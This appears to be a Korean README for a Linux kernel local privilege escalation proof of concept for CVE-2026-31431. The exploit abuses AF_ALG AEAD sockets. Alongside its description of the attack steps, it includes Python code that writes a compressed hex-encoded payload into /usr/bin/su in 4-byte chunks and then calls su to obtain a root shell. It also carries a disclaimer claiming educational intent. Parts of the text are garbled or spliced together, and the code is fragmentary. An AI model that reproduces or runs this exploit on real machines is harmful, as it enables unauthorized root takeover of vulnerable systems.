
로컬 권한 상승 익스플로잇으로, CVE-2026-31431을 악용하여 AF_ALG AEAD 소켓 처리를 남용함으로써 취약한 Linux 커널에서 루트 셸 접근 권한을 획득합니다.
CVE-2026-31431은 AF_ALG(커널 암호화 API) 인터페이스를 악용하는 Linux 권한 상승 취약점입니다. AEAD(연관 데이터 인증 암호화) 소켓과의 악의적인 상호 작용을 조작하여 공격자는 권한을 상승시키고 루트로 코드를 실행할 수 있습니다.
이 취약점은 암호화 소켓 작업의 부적절한 처리를 활용하여 통제된 메모리 조작과 궁극적인 권한 상승을 가능하게 합니다.
/usr/bin/su)익스플로잇:
AF_ALG 소켓 생성
다음에 바인딩:
authenc(hmac(sha256),cbc(aes))
setsockopt 및 sendmsg를 통한 조작된 페이로드 사용
의도하지 않은 커널 동작 트리거
다음을 통해 루트 셸로 전환:
g.system("su")
주요 지표:
socket(38,5,0) 사용 → AF_ALGzlib)를 통한 통제된 메모리 쓰기
**면책 조항: 저는 이 PoC의 소유자가 아닙니다. 권한이 허용된 환경에서 테스트하기 위한 교육 목적으로만 사용됩니다. 작성자/소유자는 어떠한 오용에 대해서도 책임을 지지 않습니다. **
f=g.open("/usr/bin/su",0)
i=0
e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):
c(f,i,e[i:i+4])
i+=4
g.system("su")